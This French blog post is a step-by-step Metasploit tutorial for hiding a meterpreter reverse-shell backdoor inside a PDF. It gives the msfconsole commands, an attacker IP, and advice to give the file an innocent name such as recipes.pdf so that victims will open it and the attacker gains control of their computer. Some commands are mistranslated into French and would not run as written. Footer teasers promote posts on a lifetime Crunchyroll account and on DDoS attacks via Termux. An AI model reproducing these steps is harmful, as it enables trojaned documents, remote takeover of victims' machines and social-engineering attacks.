Comment intégrer une porte dérobée dans un PDF file❓

-

 
 ✨Comment intégrer une porte dérobée dans un PDF file❓


Etape 1)Lancer Metasploit

Étape 2) Trouver l'exploitation appropriée.

Je vais rechercher dans la base de données metasploits un exploit pour adobe pdf sur windows, en utilisant cette commande :

●Code:msf > search type:exploit platform:windows adobe pdf

Vous devriez voir l'exploit "exploit/windows/fileformat/adobe_pdf_embedded_exe", que nous allons utiliser :

●Code:msf > utiliser l'exploit "exploit/windows/fileformat/adobe_pdf_embedded_exe

Étape 3) Définir la charge utile

J'utiliserai à nouveau la charge utile du meterpreter, car c'est l'une des charges utiles les plus puissantes dont nous disposons :

●Code:msf > exploit (adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp

Étape 4) Définir les options d'exploitation

Tout d'abord, affichez les options requises pour l'exploit :

●Code:msf > exploit (adobe_pdf_embedded_exe) > afficher les options

Vous pouvez voir que nous devons fournir un fichier PDF existant à l'option INFILENAME pour y intégrer la charge utile du meterpreter. Je l'appellerai "hemantexample.pdf" :

●Code : msf > exploit (adobe_pdf_embedded_exe) > set INFILENAME example.pdf

L'option suivante est le nom du fichier de sortie, FILENAME. Changez-le en quelque chose d'innocent qui incitera les utilisateurs à l'ouvrir :
msf > exploiter (adobe_pdf_embedded_exe) > set FILENAME recipes.pdf

Enfin, nous devons préciser le LHOST, qui est notre adresse IP (celle des attaquants). La mienne est 192.168.1.8 :

●Code:msf > exploit (adobe_pdf_embedded_exe) > set LHOST 192.168.1.8

Étape 5) Exécution de l'exploit.

Maintenant que toutes les options sont définies, nous pouvons exécuter l'exploit comme ceci :

●Code : msf > exploit (adobe_pdf_embedded_exe) > exploit

Metasploit a créé un PDF nommé recipes.pdf qui contient l'auditeur Meterpeter. Maintenant, il suffit de demander aux utilisateurs d'ouvrir le pdf (Social Engineering à nouveau), et vous obtiendrez un contrôle instantané de leur ordinateur aussi simple qu'un putain de sourire :)


Merci de votre lecture, et visitez cette chaine Youtube : https://www.youtube.com/watch?v=XBRoY7aC_SU

Commentaires

Enregistrer un commentaire

Posts les plus consultés de ce blog

COMMENT AVOIR UN COMPTE CRUNCHYROLL A VIE ?

-
Image
COMMENT AVOIR UN COMPTE CRUNCHYROLL A VIE ?  A-C'est Quoi Crunchyroll ? D'apres le Crunchyroll About :Crunchyroll, une société WarnerMedia (faisant partie d'Otter Media), est la marque d'anime la plus populaire au monde, offrant à une communauté de fans à travers plus de 200 territoires une expérience à 360° autour de leurs anime préférés. Crunchyroll, comme vous l'avez peut-être déjà compris, est un service de streaming en ligne. Il propose un large éventail de contenus gratuits et payants, et il dispose également d'une section de forums pour que les utilisateurs puissent discuter des émissions qu'ils ont regardées.   B- Trois utilités de  Crunchyroll ? Bon Certaines personnes voient des téléchargeurs de vidéos  comme moi  se demandent pourquoi elles devraient les utiliser. Il existe de nombreuses raisons Regardez des vidéos hors ligne. La raison la plus évidente est que vous pourrez regarder des vidéos hors ligne. Si votre connex
Lire la suite

Les classes d’adresses IP & Masques sous réseaux [ 1er Partie ]

-
Image
❌❌ Les classes d’adresses IP & Masques sous réseaux ❌❌ 1er Partie : Niveau de difficulté 🌟🌟🌟   Par : Y.NG.J .S   Introduction 🤓 👌: Tout d'abord faut notez que 😁 Plusieurs poste( machines 💻 )  peuvent dialoguez entre eux  il est nécessaire pour cela : 👉 Qu'ils soient interconnectes physiquement . 👉Qu'ils disposent d'une configuration IP ( nous verrons la signification de ce sigle plus bas 😉 ) 🥱 Alors   Les Réseaux Informatiques sont organises Logiquement autours des adresses IP 🤫 . 🤗 Un système de communication doit pouvoir permettre à n'importe quel hôte de se mettre en relation avec n'importe quel autre , 😎 Afin qu'il n'y ait pas d’ambiguïté ( genre ton nom de famille est celui de ton voisin 😂 , tu vois sa évoque beaucoup d’ambiguïté , 😳 ou pas 😅 )  , comme je disais tant tôt on doit pas avoir d’ambiguïté pour la reconnaissance des hôtes possibles 👍 ,il est absolument nécessaire d'admettre  😊 un principe
Lire la suite

Comment Faire une attaque DDOS via Termux ?

-
Image
Comment Faire une attaque DDOS via Termux ?   Par joel_yk Le 31/07/2020 2 commentaires Qu’est-ce qu’une DDoS ? En procédant à une « attaque par déni de service » (DDoS), les attaquants ont pour but d'inonder des serveurs ou systèmes informatiques d'un grand nombre de requêtes jusqu'à ce que ces dernières rendent indisponibles leurs services et sites Internet ou que d'autres services Internet ne soient plus accessibles. De telles attaques DDoS reposent souvent sur des intérêts personnels, politiques ou économiques de la part des attaquants. C'est la raison pour laquelle les attaques DDoS ne sont, en règle générale, pa dirigées contre les envers les fournisseurs, mais plutôt contre les sites Internet hébergés par le fournisseur et qui doivent être mis à mal par la biais de l'attaque.  
Lire la suite